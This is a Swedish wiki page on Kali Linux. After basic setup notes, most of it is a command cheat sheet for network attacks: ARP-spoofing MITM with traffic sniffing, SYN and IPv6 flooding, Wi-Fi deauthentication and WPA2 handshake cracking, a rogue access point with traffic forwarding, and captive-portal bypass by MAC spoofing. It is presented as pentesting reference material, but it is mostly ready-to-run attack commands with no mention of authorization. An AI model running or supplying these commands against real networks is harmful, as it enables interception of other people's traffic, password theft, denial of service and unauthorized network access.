Kali Linux

From HackerNet
Revision as of 22:52, 9 November 2015 by Sparco (talk | contribs) (→‎Captive portal)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to: navigation, search

Kali Linux är en Debian-baserad Linuxdistribution avsedd för digitala penetrationstester och etisk hacking. Kali är uppföljaren till BackTrack.

https://www.kali.org/

Grundsetup

IP

ifconfig eth0 10.0.0.5/24 up
route add default gw 10.0.0.1
echo nameserver 8.8.8.8 > /etc/resolv.conf

SSH-server

start networking
sshd-generate
start ssh
update-rc.d -f ssh defaults

Docker

Et snabbt sätt att komma igång med Kali är med docker.

docker pull kalilinux/kali-linux-docker
docker run -t -i kalilinux/kali-linux-docker /bin/bash
root@aaca1ac4f5b5:/# ping 8.8.8.8

Verktyg

Kali är utrustat med väldigt många verktyg. Här listas några och vad de används till.

Nmap
Security Scanner

Yersinia
Attacker mot det mesta som har med nätverk att göra, inkl DHCP, STP, CDP, DTP, HSRP, VTP, 802.1q, 802.1x. Startas med:

yersinia -G

ARPSpoof

echo 1 > /proc/sys/net/ipv4/ip_forward
arpsoof -i eth0 -t 10.0.0.15 10.0.0.1
arpsoof -i eth0 -t 10.0.0.1 10.0.0.15

Samla sedan data

driftnet -i eth0
urlsnarf -i eth0

TCP Synflood

use auxiliary/dos/tcp/synflood
set RHOST 192.168.1.1
set SHOST 10.0.0.50
run

Hydra
Password cracker

Maltego
Gather information about ip addresses and domains

Metasploit
Vulnerability testing

Burp Suite
Proxy/Spider

Scapy
Packet Manipulation Tool

Hping3 - TCP Ping

hping3 -S 10.10.10.10 -a 10.10.10.12 -p 22 --flood

Parasite6 - IPv6 MITM

echo 1 > /proc/sys/net/ipv6/conf/all/forwarding
parasite6 -lR eth0

Wireless

Börja med att konfa svenska inställningar

iw reg set SE
iwconfig wlan0 txpower 27

Uncovering Hidden SSID

airmon-ng start wlan0
airodump-ng mon0
airodump-ng -c 11 mon0
aireplay-ng -0 2 -a [BSSID] mon0
iwconfig wlan0 essid [ESSID] channel 11
macchanger -m [MAC address] wlan0

WPA2

airmon-ng start wlan0
airodump-ng -w OURFILE -c 11 --bssid [BSSID] mon0
aireplay-ng -0 2 -a [BSSID] mon0
aircrack-ng OURFILE-01.cap -w /pentest/passwords/wordlists/darkc0de.lst

wpaclean <out.cap> <in.cap>

with crunch:

crunch x X "characters" | aircrack-ng ".cap file" -w - -e "essid"

with john the ripper:

john -stdout -incremental:all | aircrack-ng ".cap file" -w - -e "essid"

Rogue AP

apt-get install dhcp3-server -y
mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.bak
nano /etc/dhcp3/dhcpd.conf
 ddns-update-style ad-hoc;
 default-lease-time 600;
 max-lease-time 7200;
 subnet 192.168.1.0 netmask 255.255.255.0 {
 option subnet-mask 255.255.255.0;
 option broadcast-address 192.168.1.255;
 option routers 192.168.1.1;
 option domain-name-servers 192.168.1.1;
 range 192.168.1.10 192.168.1.100;
} 
airmon-ng start wlan0
airodump-ng mon0
airbase-ng --essid "Hitlerklubben" -c 11 mon0
ifconfig at0 192.168.1.1/24 up
route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0
/etc/init.d/dhcp3-server start
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward

Bridging

airmon-ng start wlan0
airodump-ng mon0
airbase-ng --essid "Hitlerklubben" -c 11 mon0
ifconfig at0
brctl addbr BR1
brctl addif BR1 eth0
brctl addif BR1 at0
brctl show
ifconfig eth0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
ifconfig BR1 192.168.1.50/24 up
echo 1 > /proc/sys/net/ipv4/ip_forward

IPv6

Med IPv6 finns det mycket att tänka på och testa.

fake_router6 eth0 2001::/64
detect-new-ip6 eth0
dos-new-ip6 eth0
flood_router6 eth0
flood_advertise6 eth0
implementation6 eth0 2001::1
smurf6 eth0 2001::1

Captive portal

Många företag tex hotel använder en captive portal för att kontrollera vilka som använder deras trådlösa nätverk.

Många portaler filtrerar på MAC så om man hittar en som fungerar via en ipscan så räcker det för att komma åt internet.